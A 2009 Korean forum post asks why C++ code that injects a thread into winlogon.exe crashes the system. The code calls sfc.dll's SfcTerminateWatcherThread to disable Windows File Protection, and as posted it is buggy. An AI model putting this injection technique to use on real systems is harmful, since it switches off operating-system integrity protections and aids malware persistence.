CreateRemoteThread 관련 질문입니다.
글쓴이: bjgangs / 작성시간: 수, 2009/10/07 - 9:32오후
간단하게 코드를 설명하자면,
winlogon.exe 프로세스를 열어서 그안에 sfc.dll 안의 서수 2에 해당하는 함수의 내용을 인젝션 하고 실행하는 코드입니다.
디버깅을 해보면 CreateRemoteThread 함수를 실행하는 과정에서 에러가 발생합니다.
실행하면 윈도우에서 blue screen이 뜨면서 꺼지네요.
실행환경은 Windows XP sp2이구요 vc++ 6를 사용했습니다.
Windows File protection 우회방법 실습중에 발생한 문제입니다.
조언 부탁드립니다.
헤더가 보이질 않네요^^;;
따로 적겠습니다.
windows.h
tchar.h
stdio.h
tlhelp32.h
#define WIN32_LEAN_AND_MEAN
#define STRICT
#include <windows.h>
#include <tchar.h>
#include <stdio.h>
#include <tlhelp32.h>
#pragma check_stack (off)
DWORD exec_func(FARPROC SfcTerminateWatcherThread)
{
SfcTerminateWatcherThread();
return 0;
}
void after_thread_func(void){}
#pragma check_stack
int adjust_privileges(void);
DWORD get_process_pid(char *);
int inject_thread(DWORD, LPVOID);
int main(int argc, char *argv[])
{
if(argc < 2){
printf("%s [process name]\n", argv[0]);
return 1;
}
FARPROC pSTWT = GetProcAddress(LoadLibrary("sfc.dll"), (LPCSTR)2);
if(pSTWT == NULL){
printf("Error: SfcTerminateWatcherThread\n");
return -1;
}
int err = 0;
if(err = adjust_privileges()){
printf("Error: adjust_privileges:%d\n", err);
return -1;
}
DWORD dwPID;
if((dwPID = get_process_pid(argv[1])) == 0){
printf("Error: get_process_pid\n");
return -1;
}
if(err = inject_thread(dwPID, pSTWT)){
printf("Error: inject_thread:%d\n", err);
return -1;
}
printf("Windows File Protection Disabled.\n");
return 0;
}
int adjust_privileges(void)
{
int ret = 0;
HANDLE hToken = NULL;
try{
if( ! OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
throw 1;
LUID luid;
if( ! LookupPrivilegeValue(NULL, "SeDebugPrivilege", &luid))
throw 2;
TOKEN_PRIVILEGES tk_priv;
tk_priv.PrivilegeCount = 1;
tk_priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
tk_priv.Privileges[0].Luid = luid;
if( ! AdjustTokenPrivileges(hToken, FALSE, &tk_priv, 0, NULL, NULL))
throw 3;
}catch(int err){
ret = err;
}
CloseHandle(hToken);
return ret;
}
DWORD get_process_pid(char *psname)
{
DWORD pid = 0;
HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if(hSnap == INVALID_HANDLE_VALUE)
return 0;
PROCESSENTRY32 pe;
pe.dwSize = sizeof(pe);
BOOL bResult = Process32First(hSnap, &pe);
while(bResult){
if( ! strcmp(pe.szExeFile, psname))
pid = pe.th32ProcessID;
bResult = Process32Next(hSnap, &pe);
}
CloseHandle(hSnap);
return pid;
}
int inject_thread(DWORD dwPID, LPVOID pfunc)
{
int ret = 0;
HANDLE hProcess = NULL;
LPVOID remote_mem = NULL;
try{
if((hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID)) == NULL)
throw 1;
remote_mem = VirtualAllocEx(hProcess, NULL,
(SIZE_T)((char *)after_thread_func - (char *)exec_func),
MEM_COMMIT, PAGE_READWRITE);
if(remote_mem == NULL)
throw 2;
BOOL wFlag = WriteProcessMemory(hProcess, remote_mem, (char *)exec_func,
(SIZE_T)((char *)after_thread_func - (char *)exec_func), (SIZE_T *)0);
if(wFlag == FALSE)
throw 3;
HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0,
(LPTHREAD_START_ROUTINE)remote_mem, pfunc, 0, NULL);
if(hThread == NULL)
throw 4;
if(WaitForSingleObject(hThread, 10 * 1000) == WAIT_TIMEOUT)
throw 5;
CloseHandle(hThread);
}catch(int err){
if(err > 2)
VirtualFreeEx(hProcess, remote_mem, 0, MEM_RELEASE);
ret = err;
}
CloseHandle(hProcess);
return ret;
}Forums:
흠...
winlogon.exe를 dll injection하면 blue screen까지 뜨나요? 놀랍군요.
그런데 제가 읽었던 Jeffrey Ritcher 책의 내용과는 안 맞는 부분이 많은 것 같네요.
댓글 달기